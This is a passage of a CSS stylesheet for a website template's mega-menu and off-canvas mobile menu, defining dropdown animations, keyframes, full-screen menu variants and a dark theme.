  -moz-transition: opacity .35s ease, visibility .35s ease;
  -o-transition: opacity .35s ease, visibility .35s ease;
  transition: opacity .35s ease, visibility .35s ease;
}
.sp-megamenu-parent.menu-fade .sp-has-child:hover >.sp-dropdown {
  display: block;
  opacity: 1;
  visibility: visible;
}
.sp-megamenu-parent.menu-zoom .sp-has-child:hover >.sp-dropdown {
  -webkit-animation: spMenuZoom 0.6s ease;
  animation: spMenuZoom 0.6s ease;
  -webkit-transform-origin: 50% 0%;
  transform-origin: 50% 0%;
}
.sp-megamenu-parent.menu-fade-down .sp-has-child:hover >.sp-dropdown {
  opacity: 0;
  visibility: hidden;
  -webkit-animation: spMenuFadeInDown 0.35s ease forwards 0.1s;
  animation: spMenuFadeInDown 0.35s ease-in-out forwards 0.1s;
}
.sp-megamenu-parent.menu-fade-down-fade-up .sp-has-child >.sp-dropdown {
  display: block;
  margin: 0;
  opacity: 0;
  visibility: hidden;
  -webkit-transform: translateY(-25px);
  -moz-transform: translateY(-25px);
  transform: translateY(-25px);
  -webkit-transition: transform .4s ease, opacity .2s ease .1s, visibility .2s ease .1s;
  -moz-transition: transform .4s ease, opacity .2s ease .1s, visibility .2s ease .1s;
  -o-transition: transform .4s ease, opacity .2s ease .1s, visibility .2s ease .1s;
  transition: transform .4s ease, opacity .2s ease .1s, visibility .2s ease .1s;
}
.sp-megamenu-parent.menu-fade-down-fade-up .sp-has-child:hover >.sp-dropdown {
  display: block;
  opacity: 1;
  visibility: visible;
  -webkit-transform: translateY(0px);
  -moz-transform: translateY(0px);
  transform: translateY(0px);
}
.safari .sp-megamenu-parent li a {
  -webkit-transform: translateZ(0);
}
#offcanvas-toggler {
  float: right;
  position: relative;
  z-index: 3;
}
#offcanvas-toggler >i {
  display: inline-table;
  text-align: center;
  width: 32px;
  padding: 0;
  font-size: 18px;
  background: transparent;
  vertical-align: middle;
  margin: -5px auto 0;
  border-radius: 3px;
  cursor: pointer;
  -webkit-transition: color 400ms, background-color 400ms;
  -moz-transition: color 400ms, background-color 400ms;
  -o-transition: color 400ms, background-color 400ms;
  transition: color 400ms, background-color 400ms;
}
#offcanvas-toggler >i:hover {
  color: #fff;
}
.off-canvas-menu-init {
  overflow-x: hidden;
  position: relative;
}
.offcanvas .offcanvas-overlay {
  visibility: visible;
  opacity: 1;
}
.offcanvas-overlay {
  background: rgba(0,0,0,0.2);
  bottom: 0;
  left: 0;
  opacity: 0;
  position: absolute;
  right: 0;
  top: 0;
  z-index: 999;
  visibility: hidden;
  -webkit-transition: .5s cubic-bezier(0.5,0,0.3,1);
  transition: .5s cubic-bezier(0.5,0,0.3,1);
}
.off-canvas-menu-wrap {
  position: relative;
  -webkit-transition: .5s cubic-bezier(0.5,0,0.3,1);
  transition: .5s cubic-bezier(0.5,0,0.3,1);
  right: 0;
  top: 0;
  backface-visibility: hidden;
}
.close-offcanvas {
  position: absolute;
  top: 15px;
  right: 15px;
  z-index: 1;
  color: #777;
  background: transparent;
  border: 1px solid #ccc;
  border-radius: 100%;
  width: 22px;
  height: 22px;
  line-height: 20px;
  text-align: center;
  font-size: 12px;
  -webkit-transition: border 300ms, color 300ms;
  -moz-transition: border 300ms, color 300ms;
  -o-transition: border 300ms, color 300ms;
  transition: border 300ms, color 300ms;
}
.accordion-menu li {
  position: relative;
}
.accordion-menu li a {
  padding: 10px 20px;
  line-height: 28px;
  -webkit-transition: 1.7s ease;
  -moz-transition: 1.7s ease;
  -o-transition: 1.7s ease;
  transition: 1.7s ease;
}
.accordion-menu li a >img {
  max-height: 20px;
  max-width: 20px;
  display: inline;
  margin: -4px 7px 0 0;
}
.accordion-menu li a > i {
  width: 24px;
  text-align: center;
  margin: 0 auto;
  text-indent: 0;
}
.accordion-menu li a > i.pe {
  font-size: 110%;
  margin-top: -2px;
  vertical-align: middle;
}
.accordion-menu li a > i:before {
  width: 24px;
  text-align: center;
  margin: 0 auto;
}
.accordion-menu li ul > li > a {
  text-indent: 10px;
}
.accordion-menu li ul > li > ul > li > a {
  text-indent: 20px;
}
.accordion-menu li .accordion-menu-toggler {
  display: inline-block;
  position: absolute;
  top: 0;
  right: 0;
  width: 33%;
  line-height: 41px;
  cursor: pointer;
}
.accordion-menu li .accordion-menu-toggler .open-icon {
  text-align: center;
  font-size: 0.7em;
}
.accordion-menu li .accordion-menu-toggler .open-icon:before {
  line-height: 32px;
  text-align: center;
  position: absolute;
  right: 12px;
  top: 5px;
  -webkit-transform: rotate(180deg);
  transform: rotate(180deg);
  -webkit-transition: .3s ease;
  -moz-transition: .3s ease;
  -o-transition: .3s ease;
  transition: .3s ease;
}
.accordion-menu li .accordion-menu-toggler.collapsed .open-icon:before {
  -webkit-transform: rotate(0deg);
  transform: rotate(0deg);
}
.accordion-menu li .separator {
  border-bottom: none;
  padding: 0;
}
.accordion-menu li .divider-separator {
  display: none;
}
.accordion-menu li .divider-separator >a:before,
.accordion-menu li .divider-separator >a:after {
  display: none;
  text-indent: -9999em;
}
.accordion-menu li.active .accordion-menu-toggler.active-open .open-icon {
  color: #f14833;
}
.offcanvas-menu {
  width: 320px;
  height: 100vh;
  background: #fff;
  box-shadow: -1px 0 10px rgba(0,0,0,0.15);
  color: #777;
  position: fixed;
  top: 0;
  right: 0;
  -webkit-transform: translateX(320px);
  transform: translateX(320px);
  visibility: hidden;
  overflow-y: scroll;
  -webkit-transition: .5s cubic-bezier(0.5,0,0.3,1);
  -moz-transition: .5s cubic-bezier(0.5,0,0.3,1);
  -o-transition: .5s cubic-bezier(0.5,0,0.3,1);
  transition: .5s cubic-bezier(0.5,0,0.3,1);
  z-index: 1007;
}
.offcanvas-menu .offcanvas-inner {
  padding: 30px 20px 20px;
}
.offcanvas-menu .offcanvas-inner .sp-module {
  margin-top: 20px;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li {
  border: none;
  position: relative;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li a,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .nav-header,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .separator {
  display: block;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
  padding: 4px 20px;
  line-height: 2;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li a:before,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .nav-header:before,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .separator:before {
  display: none;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li a >img,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .nav-header >img,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .separator >img {
  max-height: 22px;
  max-width: 22px;
  display: inline;
  margin: -4px 7px 0 0;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li a > i,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .nav-header > i,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .separator > i {
  width: 24px;
  text-align: center;
  margin: 0 auto;
  text-indent: 0;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li a > i.pe,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .nav-header > i.pe,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .separator > i.pe {
  font-size: 110%;
  margin-top: -2px;
  vertical-align: middle;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li a > i:before,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .nav-header > i:before,
.offcanvas-menu .offcanvas-inner .sp-module ul > li .separator > i:before {
  width: 24px;
  text-align: center;
  margin: 0 auto;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li .divider {
  background: transparent;
  display: block;
  height: auto;
  margin: 0;
  padding: 0;
  z-index: 0;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li .divider .separator {
  background: transparent;
  display: none;
  position: relative;
  width: 100%;
  padding: 0;
  text-indent: -9999em;
  clear: both;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li .divider .text {
  padding: 4px 20px;
  display: block;
  text-indent: 0;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li >a:before,
.offcanvas-menu .offcanvas-inner .sp-module ul > li >a:after {
  display: none;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li ul > li > a {
  text-indent: 10px;
}
.offcanvas-menu .offcanvas-inner .sp-module ul > li ul > li > ul > li > a {
  text-indent: 20px;
}
.offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li a {
  padding: 10px 20px;
  line-height: 28px;
}
.offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .accordion-menu-toggler {
  display: inline-block;
  position: absolute;
  top: 0;
  right: 0;
  padding-right: 50px;
  cursor: pointer;
}
.offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .accordion-menu-toggler .open-icon:before {
  right: 20px;
}
.offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .separator {
  border-bottom: none;
  padding: 0;
}
.offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .divider-separator {
  display: none;
}
.offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .divider-separator >a:before,
.offcanvas-menu .offcanvas-inner .sp-module ul.accordion-menu > li .divider-separator >a:after {
  display: none;
  text-indent: -9999em;
}
.offcanvas-menu .offcanvas-inner .sp-module:first-child {
  margin-top: 0;
}
.offcanvas-menu .offcanvas-inner .sp-module .sp-module-content > ul {
  margin: 0 -18px;
}
.offcanvas-menu .offcanvas-inner .search {
  margin-top: 32px;
}
.offcanvas-menu .offcanvas-inner .search input {
  width: 100%;
  background: transparent;
  border-radius: 0;
  border: 1px solid #eee;
  box-shadow: none;
  -webkit-box-shadow: none;
}
.offcanvas {
  width: 100%;
  height: 100%;
  position: relative;
  -webkit-transition: .5s cubic-bezier(0.5,0,0.3,1);
  -moz-transition: .5s cubic-bezier(0.5,0,0.3,1);
  -o-transition: .5s cubic-bezier(0.5,0,0.3,1);
  transition: .5s cubic-bezier(0.5,0,0.3,1);
}
.offcanvas .body-innerwrapper:after {
  width: 100%;
  height: 100%;
  opacity: 1;
  -webkit-transition: opacity 0.5s;
  -moz-transition: opacity 0.5s;
  -o-transition: opacity 0.5s;
  transition: opacity 0.5s;
}
.offcanvas .off-canvas-menu-wrap {
  right: 0;
  -webkit-transform: translateX(-320px);
  transform: translateX(-320px);
}
.offcanvas .off-canvas-menu-wrap:after {
  width: 100%;
  height: 100%;
  right: 0;
}
.offcanvas .offcanvas-menu {
  opacity: 1;
  visibility: visible;
  z-index: 9999;
  right: 0;
  position: fixed;
  height: 100%;
  -webkit-transform: translateX(0);
  transform: translateX(0);
}
.offcanvas .offcanvas-menu .nav-child li a,
.offcanvas .offcanvas-menu .nav-child li .nav-child li a,
.offcanvas .offcanvas-menu .nav-child li .nav-child li .nav-child li a,
.offcanvas .offcanvas-menu .nav-child li .nav-child li .nav-child li .nav-child li a {
  text-indent: 15px;
}
.offcanvas-overlay {
  opacity: 0;
  -webkit-transition: all .4s cubic-bezier(0.5,0,0.3,1);
  -moz-transition: all .4s cubic-bezier(0.5,0,0.3,1);
  -o-transition: all .4s cubic-bezier(0.5,0,0.3,1);
  transition: all .4s cubic-bezier(0.5,0,0.3,1);
}
.menu .nav-child.small {
  font-size: inherit;
}
.sp-megamenu-parent.menu-fade-up .sp-has-child >.sp-dropdown {
  display: block;
  opacity: 0;
  visibility: hidden;
  -webkit-transform: translate3d(0,30px,0);
  -moz-transform: translate3d(0,30px,0);
  transform: translate3d(0,30px,0);
  -webkit-transform-origin: 50% 50%;
  transform-origin: 50% 50%;
  -webkit-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
  -moz-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
  -o-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
  transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
}
.sp-megamenu-parent.menu-fade-up .sp-has-child:hover >.sp-dropdown {
  display: block;
  opacity: 1;
  visibility: visible;
  -webkit-transform: translate3d(0,0,0);
  -moz-transform: translate3d(0,0,0);
  transform: translate3d(0,0,0);
}
.sp-megamenu-parent.menu-rotate .sp-has-child:hover >.sp-dropdown {
  opacity: 1;
  -webkit-transform: perspective(1000px) rotateX(0deg);
  transform: perspective(1000px) rotateX(0deg);
  visibility: visible;
}
.sp-megamenu-parent.menu-slide-down .sp-has-child >.sp-dropdown {
  display: block;
  visibility: hidden;
}
.sp-megamenu-parent.menu-slide-down .sp-has-child:hover >.sp-dropdown {
  visibility: visible;
  -webkit-animation: spMenuSlideDown 0.5s ease;
  animation: spMenuSlideDown 0.5s ease;
}
.sp-megamenu-parent.menu-slide-down .sp-has-child:hover >.sp-dropdown.sp-dropdown-sub {
  left: 100%;
}
.menu-rotate .sp-has-child >.sp-dropdown {
  -webkit-transform-origin: top center;
  transform-origin: top center;
  -webkit-transform: perspective(1200px) rotateX(-70deg);
  transform: perspective(1200px) rotateX(-70deg);
  -webkit-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
  -moz-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
  -o-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
  transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.3s ease, visibility 0.3s ease;
  opacity: 0;
  visibility: hidden;
  display: block;
}
.menu-rotate .sp-has-child >.sp-dropdown.sp-dropdown-mega {
  left: auto;
  right: 0;
}
.menu-drop-in .sp-has-child >.sp-dropdown {
  -webkit-animation: spMenuFadeInUp 0.7s ease;
  animation: spMenuFadeInUp 0.7s ease;
}
.menu-drop-in .sp-has-child .sp-dropdown-inner {
  background: transparent none repeat scroll 0 0;
  box-shadow: 0 2px 4px 0 rgba(0,0,0,0.1);
}
.menu-drop-in .sp-has-child .sp-dropdown-items {
  perspective: 1000px;
}
.menu-drop-in .sp-has-child .sp-menu-item {
  -webkit-transform: translate(0,100px);
  transform: translate(0,100px);
  opacity: 0;
  -webkit-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.35s ease, visibility 0.35s ease;
  -moz-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.35s ease, visibility 0.35s ease;
  -o-transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.35s ease, visibility 0.35s ease;
  transition: -webkit-transform 0.5s ease, transform 0.5s ease, opacity 0.35s ease, visibility 0.35s ease;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item {
  -webkit-animation-timing-function: ease-in-out;
  animation-timing-function: ease-in-out;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
  -webkit-animation-name: dropup;
  animation-name: dropup;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(1) {
  -webkit-animation-duration: 0.2s;
  animation-duration: 0.2s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(2) {
  -webkit-animation-duration: 0.3s;
  animation-duration: 0.3s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(3) {
  -webkit-animation-duration: 0.4s;
  animation-duration: 0.4s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(4) {
  -webkit-animation-duration: 0.5s;
  animation-duration: 0.5s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(5) {
  -webkit-animation-duration: 0.6s;
  animation-duration: 0.6s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(6) {
  -webkit-animation-duration: 0.7s;
  animation-duration: 0.7s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(7) {
  -webkit-animation-duration: 0.8s;
  animation-duration: 0.8s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(8) {
  -webkit-animation-duration: 0.9s;
  animation-duration: 0.9s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(9) {
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(10) {
  -webkit-animation-duration: 1.1s;
  animation-duration: 1.1s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(11) {
  -webkit-animation-duration: 1.2s;
  animation-duration: 1.2s;
}
.menu-drop-in .sp-has-child:hover .sp-menu-item:nth-child(12) {
  -webkit-animation-duration: 1.3s;
  animation-duration: 1.3s;
}
.mobile .sp-megamenu-parent .sp-has-child .sp-dropdown {
  display: none;
}
.mobile .sp-megamenu-parent .sp-has-child:hover .sp-dropdown,
.mobile .sp-megamenu-parent .sp-has-child:focus .sp-dropdown {
  z-index: 99;
  opacity: 0;
  visibility: hidden;
  -webkit-animation: MobileFadeInDown 0.35s ease forwards 0.1s;
  animation: MobileFadeInDown 0.35s ease-in-out forwards 0.1s;
}
@keyframes dropup {
  0% {
    opacity: 0;
    transform: translate(0,100px);
  }
  100% {
    opacity: 1;
    transform: translate(0,0);
  }
}
@-webkit-keyframes dropup {
  0% {
    opacity: 0;
    transform: translate(0,100px);
  }
  100% {
    opacity: 1;
    transform: translate(0,0);
  }
}
.menu-twist .sp-has-child >.sp-dropdown {
  -webkit-animation: spMenuFadeInUp 0.7s ease;
  animation: spMenuFadeInUp 0.7s ease;
}
.menu-twist .sp-has-child .sp-dropdown-inner {
  background: transparent none repeat scroll 0 0;
  box-shadow: 0 2px 4px 0 rgba(0,0,0,0.1);
}
.menu-twist .sp-has-child .sp-menu-item {
  -webkit-transform: rotateY(90deg);
  transform: rotateY(90deg);
}
.menu-twist .sp-has-child:hover .sp-menu-item {
  -webkit-animation-direction: normal;
  animation-direction: normal;
  -webkit-animation-iteration-count: 1;
  animation-iteration-count: 1;
  -webkit-animation-timing-function: ease-in-out;
  animation-timing-function: ease-in-out;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
  -webkit-animation-name: twist;
  animation-name: twist;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(1) {
  -webkit-animation-duration: 0.2s;
  animation-duration: 0.2s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(2) {
  -webkit-animation-duration: 0.3s;
  animation-duration: 0.3s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(3) {
  -webkit-animation-duration: 0.4s;
  animation-duration: 0.4s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(4) {
  -webkit-animation-duration: 0.5s;
  animation-duration: 0.5s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(5) {
  -webkit-animation-duration: 0.6s;
  animation-duration: 0.6s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(6) {
  -webkit-animation-duration: 0.7s;
  animation-duration: 0.7s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(7) {
  -webkit-animation-duration: 0.8s;
  animation-duration: 0.8s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(8) {
  -webkit-animation-duration: 0.9s;
  animation-duration: 0.9s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(9) {
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(10) {
  -webkit-animation-duration: 1.1s;
  animation-duration: 1.1s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(11) {
  -webkit-animation-duration: 1.2s;
  animation-duration: 1.2s;
}
.menu-twist .sp-has-child:hover .sp-menu-item:nth-child(12) {
  -webkit-animation-duration: 1.3s;
  animation-duration: 1.3s;
}
@keyframes twist {
  0% {
    opacity: 0;
    transform: rotateY(90deg);
  }
  100% {
    opacity: 1;
    transform: rotateY(0);
  }
}
@-webkit-keyframes twist {
  0% {
    opacity: 0;
    -webkit-transform: rotateY(90deg);
  }
  100% {
    opacity: 1;
    -webkit-transform: rotateY(0);
  }
}
@-webkit-keyframes spMenuFadeIn {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
@keyframes spMenuFadeIn {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
@-webkit-keyframes spMenuZoom {
  0% {
    opacity: 0;
    -webkit-transform: scale(.8);
  }
  100% {
    opacity: 1;
    -webkit-transform: scale(1);
  }
}
@keyframes spMenuZoom {
  0% {
    opacity: 0;
    transform: scale(.8);
    -webkit-transform: scale(.8);
  }
  100% {
    opacity: 1;
    transform: scale(1);
    -webkit-transform: scale(1);
  }
}
@-webkit-keyframes spMenuSlideDown {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-30px,0);
  }
  100% {
    opacity: 1;
    -webkit-transform: none;
  }
}
@keyframes spMenuSlideDown {
  0% {
    opacity: 0;
    transform: translate3d(0,-30px,0);
  }
  100% {
    opacity: 1;
    transform: none;
  }
}
@-webkit-keyframes spMenuFadeInUp {
  0% {
    opacity: 0;
    visibility: hidden;
    -webkit-transform: translate3d(0,30px,0);
  }
  100% {
    opacity: 1;
    visibility: visible;
    -webkit-transform: translate3d(0,0,0);
  }
}
@keyframes spMenuFadeInUp {
  0% {
    opacity: 0;
    visibility: hidden;
    transform: translate3d(0,30px,0);
  }
  100% {
    opacity: 1;
    visibility: visible;
    transform: translate3d(0,0,0);
  }
}
@-webkit-keyframes MobileFadeInDown {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0,-30px,0);
  }
  100% {
    opacity: 1;
    visibility: visible;
    -webkit-transform: none;
  }
}
@keyframes MobileFadeInDown {
  0% {
    opacity: 0;
    transform: translate3d(0,-30px,0);
  }
  100% {
    opacity: 1;
    visibility: visible;
    transform: none;
  }
}
.slide-top-menu .offcanvas-menu {
  -webkit-transform: translateX(0);
  transform: translateX(0);
}
.slide-top-menu .off-canvas-menu-wrap {
  right: 0;
}
.slide-top-menu .offcanvas-overlay {
  visibility: visible;
  opacity: 1;
}
.slide-top-menu .offcanvas-menu {
  right: 0;
  visibility: visible;
}
.full-screen .offcanvas-menu {
  right: -100%;
  width: 100%;
  transform: translateX(0);
  transition: all .6s cubic-bezier(0.5,0,0.3,1);
}
.full-screen .offcanvas-menu .offcanvas-inner {
  margin: 0 auto;
  text-align: center;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module {
  margin-bottom: 8vh;
  margin-top: 8vh;
  padding-bottom: 0;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul {
  background: transparent;
  height: auto;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li {
  overflow: inherit;
  border: none;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li .separator,
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li .nav-header {
  font-size: 140%;
  color: #a0a0a0;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li a {
  border: none;
  display: inline-block;
  font-size: 190%;
  padding: 5px 20px;
  margin: 0 auto;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li a:before {
  display: none;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li a:hover,
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li a:focus {
  background: transparent;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li .accordion-menu-toggler {
  position: relative;
  left: auto;
  width: 50px;
  right: auto;
  font-size: 28px;
  top: 1px;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li ul li {
  display: block;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li ul li a {
  margin: 0 auto;
  font-size: 120%;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li ul li .accordion-menu-toggler {
  font-size: 20px;
  top: 5px;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li ul li:last-child {
  margin: 0 auto 20px;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li:hover a,
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul li:focus a {
  background: transparent;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module ul.nav.menu {
  padding-bottom: 75px;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module .search {
  max-width: 300px;
  margin: 25px auto 0;
}
.full-screen .offcanvas-menu .offcanvas-inner .sp-module .sp-module-title {
  font-size: 28px;
}
.full-screen .offcanvas-menu .close-offcanvas {
  font-size: 20px;
  height: 35px;
  line-height: 1;
  right: 30px;
  top: 25px;
  width: 35px;
  padding-top: 6px;
}
.full-screen-off-canvas.ltr .offcanvas-menu {
  visibility: visible;
  z-index: 9999;
  width: 100%;
  right: 0;
}
.full-screen-ftop .offcanvas-menu {
  right: 0;
  width: 100%;
  opacity: 0;
  -webkit-transform: translateX(0);
  transform: translateX(0);
  transition: all 0.5s cubic-bezier(0.5,0,0.3,1);
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner {
  margin: 0 auto;
  text-align: center;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module {
  margin-bottom: 80px;
  margin-top: 80px;
  padding-bottom: 0;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul {
  background: transparent;
  height: auto;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul >li {
  opacity: 0;
  -webkit-transform: translate3d(0px,-80px,0px);
  transform: translate3d(0px,-80px,0px);
  -webkit-transition: transform 0.5s ease 0s, opacity 0.5s ease 0s;
  transition: transform 0.5s ease 0s, opacity 0.5s ease 0s;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li {
  overflow: inherit;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li .separator,
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li .nav-header {
  font-size: 120%;
  color: #a0a0a0;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li a {
  border: none;
  display: inline-block;
  font-size: 190%;
  padding: 5px 20px;
  margin: 0 auto;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li a:before {
  display: none;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li a:hover,
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li a:focus {
  background: transparent;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li .accordion-menu-toggler {
  position: relative;
  left: auto;
  right: auto;
  font-size: 28px;
  width: 50px;
  top: 1px;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li ul li {
  display: block;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li ul li a {
  margin: 0 auto;
  font-size: 120%;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li ul li .accordion-menu-toggler {
  font-size: 20px;
  top: 5px;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li ul li:last-child {
  margin: 0 auto 20px;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li:hover a,
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul li:focus a {
  background: transparent;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module ul.nav.menu {
  padding-bottom: 75px;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module .search {
  max-width: 300px;
  margin: 25px auto 0;
}
.full-screen-ftop .offcanvas-menu .offcanvas-inner .sp-module .sp-module-title {
  font-size: 28px;
}
.full-screen-ftop .offcanvas-menu .close-offcanvas {
  font-size: 20px;
  height: 35px;
  line-height: 1;
  right: 30px;
  top: 25px;
  width: 35px;
  padding-top: 6px;
}
.full-screen-off-canvas-ftop.ltr .offcanvas-menu {
  visibility: visible;
  z-index: 9999;
  width: 100%;
  right: 0;
  opacity: 1;
}
.full-screen-off-canvas-ftop.ltr .offcanvas-menu .sp-module {
  margin-top: 80px;
  margin-bottom: 80px;
}
.full-screen-off-canvas-ftop.ltr .offcanvas-menu .sp-module ul {
  background: transparent;
  height: auto;
}
.full-screen-off-canvas-ftop.ltr .offcanvas-menu .sp-module ul >li {
  opacity: 1;
  -webkit-transform: translate3d(0px,0px,0px);
  transform: translate3d(0px,0px,0px);
}
.new-look .offcanvas-menu {
  background-color: #222;
  background-color: rgba(34,34,34,0.95);
}
.new-look .offcanvas-menu .sp-module ul >li >a {
  color: #e0e0e0;
}
.new-look .offcanvas-menu .sp-module ul >li >a:hover,
.new-look .offcanvas-menu .sp-module ul >li >a:focus {
  color: #f7f7f7;
}
.new-look .offcanvas-menu .sp-module ul >li .accordion-menu-toggler {
  top: 0;
  display: block;
  float: right;
  padding: 10px;
  height: 48px;
  width: 33%;
}
.new-look .offcanvas-menu .sp-module ul >li .accordion-menu-toggler i {
  display: none !important;
}
.new-look .offcanvas-menu .sp-module ul >li .accordion-menu-toggler:before {
  background: #eee none repeat scroll 0 0;
  content: "";
  height: 8px;
  left: auto;
  position: absolute;
  right: 23px;
  top: 22px;
  width: 2px;
  -webkit-transform: rotate(-45deg);
  transform: rotate(-45deg);
}
.new-look .offcanvas-menu .sp-module ul >li .accordion-menu-toggler:after {
  background: #eee none repeat scroll 0 0;
  content: "";
  height: 2px;
  left: auto;
  position: absolute;
  right: 20px;
  top: 25px;
  width: 8px;
  -webkit-transform: rotate(-45deg);
  transform: rotate(-45deg);
}
.new-look .offcanvas-menu .sp-module ul >li .accordion-menu-toggler.collapsed:before {
  -webkit-transform: rotate(0deg);
  transform: rotate(0deg);
}
.new-look .offcanvas-menu .sp-module ul >li .accordion-menu-toggler.collapsed:after {
  -webkit-transform: rotate(0deg);
  transform: rotate(0deg);
}
